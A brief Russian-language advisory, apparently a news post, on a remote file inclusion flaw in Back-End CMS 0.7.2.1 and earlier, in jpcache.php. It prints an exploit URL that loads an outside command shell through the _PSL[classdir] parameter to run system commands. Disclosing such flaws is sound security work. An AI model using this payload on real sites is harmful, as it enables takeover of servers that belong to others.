Уязвимости в Back-End CMS

Вчера была опубликована уязвимость в Back-End CMS <= 0.7.2.1. Уязвима оказалась функция в файле jpcache.php (40ая строка).
http://example/[be_path]/class/jpcache/jpcache.php?_PSL[classdir]=http://example/cmd.php?exec=uname
Позволяет удаленному пользователю выполнить команды и получить полный контроль на сайтом.